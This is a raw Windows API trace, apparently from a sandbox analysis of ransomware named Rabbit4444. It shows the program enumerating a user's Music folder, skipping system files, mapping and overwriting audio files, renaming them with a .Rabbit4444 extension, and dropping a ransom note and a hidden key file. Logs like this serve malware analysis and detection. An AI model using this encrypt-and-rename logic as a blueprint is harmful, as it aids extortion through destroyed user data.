lpNewFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\iJM5 PvfbTCo- In.wav.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ddgorp\\ijm5 pvfbtco- in.wav.rabbit4444"), dwFlags=0x1) returned 1 [0049.319] InterlockedExchangeAdd (in: Addend=0xff618, Value=83088 | out: Addend=0xff618) returned 20671216 [0049.319] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3566 [0049.319] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b499870, ftCreationTime.dwHighDateTime=0x1d4cb2c, ftLastAccessTime.dwLowDateTime=0x6b836b20, ftLastAccessTime.dwHighDateTime=0x1d4d331, ftLastWriteTime.dwLowDateTime=0x6b836b20, ftLastWriteTime.dwHighDateTime=0x1d4d331, nFileSizeHigh=0x0, nFileSizeLow=0x57c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nMGREfCTbmqLn8Nm.wav", cAlternateFileName="NMGREF~1.WAV")) returned 1 [0049.319] lstrcmpiW (lpString1="nMGREfCTbmqLn8Nm.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.319] lstrcmpiW (lpString1="nMGREfCTbmqLn8Nm.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.319] lstrcmpiW (lpString1="nMGREfCTbmqLn8Nm.wav", lpString2="Rabbit4444.exe") returned -1 [0049.319] lstrcmpiW (lpString1="nMGREfCTbmqLn8Nm.wav", lpString2=".") returned 1 [0049.319] lstrcmpiW (lpString1="nMGREfCTbmqLn8Nm.wav", lpString2="..") returned 1 [0049.320] lstrcmpiW (lpString1="nMGREfCTbmqLn8Nm.wav", lpString2="windows") returned -1 [0049.320] lstrcmpiW (lpString1="nMGREfCTbmqLn8Nm.wav", lpString2="bootmgr") returned 1 [0049.320] lstrcmpiW (lpString1="nMGREfCTbmqLn8Nm.wav", lpString2="pagefile.sys") returned -1 [0049.320] lstrcmpiW (lpString1="nMGREfCTbmqLn8Nm.wav", lpString2="boot") returned 1 [0049.320] lstrcmpiW (lpString1="nMGREfCTbmqLn8Nm.wav", lpString2="ids.txt") returned 1 [0049.320] lstrcmpiW (lpString1="nMGREfCTbmqLn8Nm.wav", lpString2="NTUSER.DAT") returned -1 [0049.320] lstrcpyW (in: lpString1=0x130eb72, lpString2="nMGREfCTbmqLn8Nm.wav" | out: lpString1="nMGREfCTbmqLn8Nm.wav") returned="nMGREfCTbmqLn8Nm.wav" [0049.320] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\nMGREfCTbmqLn8Nm.wav", dwFileAttributes=0x0) returned 1 [0049.320] lstrlenW (lpString="nMGREfCTbmqLn8Nm.wav") returned 20 [0049.320] lstrlenW (lpString="Rabbit4444") returned 10 [0049.320] lstrcmpiW (lpString1="qLn8Nm.wav", lpString2="Rabbit4444") returned -1 [0049.320] lstrlenW (lpString=".dll") returned 4 [0049.320] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0049.320] lstrlenW (lpString=".lnk") returned 4 [0049.320] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0049.320] lstrlenW (lpString=".ini") returned 4 [0049.320] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0049.320] lstrlenW (lpString=".sys") returned 4 [0049.320] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0049.320] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\nMGREfCTbmqLn8Nm.wav" (normalized: "c:\\users\\fd1hvy\\music\\ddgorp\\nmgrefctbmqln8nm.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.320] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.320] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14063112309) returned 1 [0049.320] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=22472) returned 1 [0049.320] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0049.320] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0049.321] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5ad0, lpName=0x0) returned 0x298 [0049.321] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5ad0) returned 0x70000 [0049.321] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.321] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0049.322] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.322] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0049.322] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.322] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0049.322] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.322] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0049.322] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14063269444) returned 1 [0049.322] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0049.322] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0049.322] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.322] CloseHandle (hObject=0x298) returned 1 [0049.322] CloseHandle (hObject=0x278) returned 1 [0049.324] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\ddgoRP\\nMGREfCTbmqLn8Nm.wav.Rabbit4444") returned 60 [0049.324] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\nMGREfCTbmqLn8Nm.wav" (normalized: "c:\\users\\fd1hvy\\music\\ddgorp\\nmgrefctbmqln8nm.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\nMGREfCTbmqLn8Nm.wav.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ddgorp\\nmgrefctbmqln8nm.wav.rabbit4444"), dwFlags=0x1) returned 1 [0049.324] InterlockedExchangeAdd (in: Addend=0xff618, Value=22480 | out: Addend=0xff618) returned 20754304 [0049.324] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3568 [0049.325] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1772bf30, ftCreationTime.dwHighDateTime=0x1d4cc6b, ftLastAccessTime.dwLowDateTime=0xa8843120, ftLastAccessTime.dwHighDateTime=0x1d4c996, ftLastWriteTime.dwLowDateTime=0xa8843120, ftLastWriteTime.dwHighDateTime=0x1d4c996, nFileSizeHigh=0x0, nFileSizeLow=0x2eda, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="q8tNQuca9CLizMc.wav", cAlternateFileName="Q8TNQU~1.WAV")) returned 1 [0049.325] lstrcmpiW (lpString1="q8tNQuca9CLizMc.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.325] lstrcmpiW (lpString1="q8tNQuca9CLizMc.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.325] lstrcmpiW (lpString1="q8tNQuca9CLizMc.wav", lpString2="Rabbit4444.exe") returned -1 [0049.325] lstrcmpiW (lpString1="q8tNQuca9CLizMc.wav", lpString2=".") returned 1 [0049.325] lstrcmpiW (lpString1="q8tNQuca9CLizMc.wav", lpString2="..") returned 1 [0049.325] lstrcmpiW (lpString1="q8tNQuca9CLizMc.wav", lpString2="windows") returned -1 [0049.325] lstrcmpiW (lpString1="q8tNQuca9CLizMc.wav", lpString2="bootmgr") returned 1 [0049.325] lstrcmpiW (lpString1="q8tNQuca9CLizMc.wav", lpString2="pagefile.sys") returned 1 [0049.325] lstrcmpiW (lpString1="q8tNQuca9CLizMc.wav", lpString2="boot") returned 1 [0049.325] lstrcmpiW (lpString1="q8tNQuca9CLizMc.wav", lpString2="ids.txt") returned 1 [0049.325] lstrcmpiW (lpString1="q8tNQuca9CLizMc.wav", lpString2="NTUSER.DAT") returned 1 [0049.325] lstrcpyW (in: lpString1=0x130eb72, lpString2="q8tNQuca9CLizMc.wav" | out: lpString1="q8tNQuca9CLizMc.wav") returned="q8tNQuca9CLizMc.wav" [0049.325] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\q8tNQuca9CLizMc.wav", dwFileAttributes=0x0) returned 1 [0049.325] lstrlenW (lpString="q8tNQuca9CLizMc.wav") returned 19 [0049.325] lstrlenW (lpString="Rabbit4444") returned 10 [0049.325] lstrcmpiW (lpString1="CLizMc.wav", lpString2="Rabbit4444") returned -1 [0049.325] lstrlenW (lpString=".dll") returned 4 [0049.325] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0049.325] lstrlenW (lpString=".lnk") returned 4 [0049.325] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0049.325] lstrlenW (lpString=".ini") returned 4 [0049.325] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0049.325] lstrlenW (lpString=".sys") returned 4 [0049.325] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0049.325] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\q8tNQuca9CLizMc.wav" (normalized: "c:\\users\\fd1hvy\\music\\ddgorp\\q8tnquca9clizmc.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.326] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.326] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14063635848) returned 1 [0049.326] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=11994) returned 1 [0049.326] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0049.326] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0049.326] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x31e0, lpName=0x0) returned 0x298 [0049.326] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x31e0) returned 0x70000 [0049.327] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.327] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0049.327] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.327] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0049.327] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0049.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0049.328] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14063849233) returned 1 [0049.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0049.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0049.328] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.328] CloseHandle (hObject=0x298) returned 1 [0049.328] CloseHandle (hObject=0x278) returned 1 [0049.331] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\ddgoRP\\q8tNQuca9CLizMc.wav.Rabbit4444") returned 59 [0049.331] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\q8tNQuca9CLizMc.wav" (normalized: "c:\\users\\fd1hvy\\music\\ddgorp\\q8tnquca9clizmc.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\q8tNQuca9CLizMc.wav.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ddgorp\\q8tnquca9clizmc.wav.rabbit4444"), dwFlags=0x1) returned 1 [0049.332] InterlockedExchangeAdd (in: Addend=0xff618, Value=12000 | out: Addend=0xff618) returned 20776784 [0049.332] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3569 [0049.332] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11b52740, ftCreationTime.dwHighDateTime=0x1d4d3f5, ftLastAccessTime.dwLowDateTime=0xc7cef4d0, ftLastAccessTime.dwHighDateTime=0x1d4ccab, ftLastWriteTime.dwLowDateTime=0xc7cef4d0, ftLastWriteTime.dwHighDateTime=0x1d4ccab, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ysJ3TUUOloNGuy.m4a", cAlternateFileName="YSJ3TU~1.M4A")) returned 1 [0049.332] lstrcmpiW (lpString1="ysJ3TUUOloNGuy.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.332] lstrcmpiW (lpString1="ysJ3TUUOloNGuy.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.332] lstrcmpiW (lpString1="ysJ3TUUOloNGuy.m4a", lpString2="Rabbit4444.exe") returned 1 [0049.332] lstrcmpiW (lpString1="ysJ3TUUOloNGuy.m4a", lpString2=".") returned 1 [0049.332] lstrcmpiW (lpString1="ysJ3TUUOloNGuy.m4a", lpString2="..") returned 1 [0049.332] lstrcmpiW (lpString1="ysJ3TUUOloNGuy.m4a", lpString2="windows") returned 1 [0049.332] lstrcmpiW (lpString1="ysJ3TUUOloNGuy.m4a", lpString2="bootmgr") returned 1 [0049.332] lstrcmpiW (lpString1="ysJ3TUUOloNGuy.m4a", lpString2="pagefile.sys") returned 1 [0049.332] lstrcmpiW (lpString1="ysJ3TUUOloNGuy.m4a", lpString2="boot") returned 1 [0049.332] lstrcmpiW (lpString1="ysJ3TUUOloNGuy.m4a", lpString2="ids.txt") returned 1 [0049.332] lstrcmpiW (lpString1="ysJ3TUUOloNGuy.m4a", lpString2="NTUSER.DAT") returned 1 [0049.332] lstrcpyW (in: lpString1=0x130eb72, lpString2="ysJ3TUUOloNGuy.m4a" | out: lpString1="ysJ3TUUOloNGuy.m4a") returned="ysJ3TUUOloNGuy.m4a" [0049.332] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\ysJ3TUUOloNGuy.m4a", dwFileAttributes=0x0) returned 1 [0049.332] lstrlenW (lpString="ysJ3TUUOloNGuy.m4a") returned 18 [0049.332] lstrlenW (lpString="Rabbit4444") returned 10 [0049.332] lstrcmpiW (lpString1="loNGuy.m4a", lpString2="Rabbit4444") returned -1 [0049.332] lstrlenW (lpString=".dll") returned 4 [0049.333] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0049.333] lstrlenW (lpString=".lnk") returned 4 [0049.333] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0049.333] lstrlenW (lpString=".ini") returned 4 [0049.333] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0049.333] lstrlenW (lpString=".sys") returned 4 [0049.333] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0049.333] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\ysJ3TUUOloNGuy.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ddgorp\\ysj3tuuolonguy.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.333] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.333] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14064361178) returned 1 [0049.333] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=91712) returned 1 [0049.333] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0049.333] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0049.333] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16940, lpName=0x0) returned 0x298 [0049.333] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16940) returned 0x70000 [0049.335] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.335] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0049.335] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.335] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0049.335] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.336] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0049.336] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.336] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0049.336] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14064643509) returned 1 [0049.336] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0049.336] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0049.336] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.337] CloseHandle (hObject=0x298) returned 1 [0049.337] CloseHandle (hObject=0x278) returned 1 [0049.339] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\ddgoRP\\ysJ3TUUOloNGuy.m4a.Rabbit4444") returned 58 [0049.339] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\ysJ3TUUOloNGuy.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ddgorp\\ysj3tuuolonguy.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\ysJ3TUUOloNGuy.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ddgorp\\ysj3tuuolonguy.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0049.340] InterlockedExchangeAdd (in: Addend=0xff618, Value=91712 | out: Addend=0xff618) returned 20788784 [0049.340] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3571 [0049.340] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11b52740, ftCreationTime.dwHighDateTime=0x1d4d3f5, ftLastAccessTime.dwLowDateTime=0xc7cef4d0, ftLastAccessTime.dwHighDateTime=0x1d4ccab, ftLastWriteTime.dwLowDateTime=0xc7cef4d0, ftLastWriteTime.dwHighDateTime=0x1d4ccab, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ysJ3TUUOloNGuy.m4a", cAlternateFileName="YSJ3TU~1.M4A")) returned 0 [0049.340] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0049.340] lstrcpyW (in: lpString1=0x130eb72, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.340] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\ddgoRP\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\music\\ddgorp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.341] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.341] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.342] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.342] CloseHandle (hObject=0x278) returned 1 [0049.343] CloseHandle (hObject=0x27c) returned 1 [0049.343] GetCurrentThreadId () returned 0xd98 [0049.343] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6390 [0049.343] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Music\\atFhmMZ", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Music\\atFhmMZ") returned="C:\\Users\\FD1HVy\\Music\\atFhmMZ" [0049.343] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x114c58 | out: hHeap=0xe0000) returned 1 [0049.343] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6388 | out: hHeap=0xe0000) returned 1 [0049.343] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Music\\atFhmMZ" | out: lpString1="C:\\Users\\FD1HVy\\Music\\atFhmMZ") returned="C:\\Users\\FD1HVy\\Music\\atFhmMZ" [0049.344] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\atFhmMZ", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\") returned="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\" [0049.344] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\.BFC0E91B00AE8A0620D3" [0049.344] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\music\\atfhmmz\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.344] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.347] FlushFileBuffers (hFile=0x27c) returned 1 [0049.348] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.348] CloseHandle (hObject=0x27c) returned 1 [0049.349] lstrlenW (lpString="C:\\Users\\FD1HVy\\Music\\atFhmMZ") returned 29 [0049.349] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.349] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\atFhmMZ\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49febf80, ftCreationTime.dwHighDateTime=0x1d4c775, ftLastAccessTime.dwLowDateTime=0xe0c996d0, ftLastAccessTime.dwHighDateTime=0x1d4cff2, ftLastWriteTime.dwLowDateTime=0xe6bcf678, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0049.349] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.349] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.349] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.349] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.349] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49febf80, ftCreationTime.dwHighDateTime=0x1d4c775, ftLastAccessTime.dwLowDateTime=0xe0c996d0, ftLastAccessTime.dwHighDateTime=0x1d4cff2, ftLastWriteTime.dwLowDateTime=0xe6bcf678, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.349] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.349] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.349] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.349] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.349] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.349] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe6bcf678, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe6bcf678, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6bcf678, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.349] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.349] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.349] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65f04880, ftCreationTime.dwHighDateTime=0x1d4cedc, ftLastAccessTime.dwLowDateTime=0x7613fc40, ftLastAccessTime.dwHighDateTime=0x1d4d4d9, ftLastWriteTime.dwLowDateTime=0x7613fc40, ftLastWriteTime.dwHighDateTime=0x1d4d4d9, nFileSizeHigh=0x0, nFileSizeLow=0x3868, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Iq3Mk4kIcDleAb4.wav", cAlternateFileName="IQ3MK4~1.WAV")) returned 1 [0049.349] lstrcmpiW (lpString1="Iq3Mk4kIcDleAb4.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.349] lstrcmpiW (lpString1="Iq3Mk4kIcDleAb4.wav", 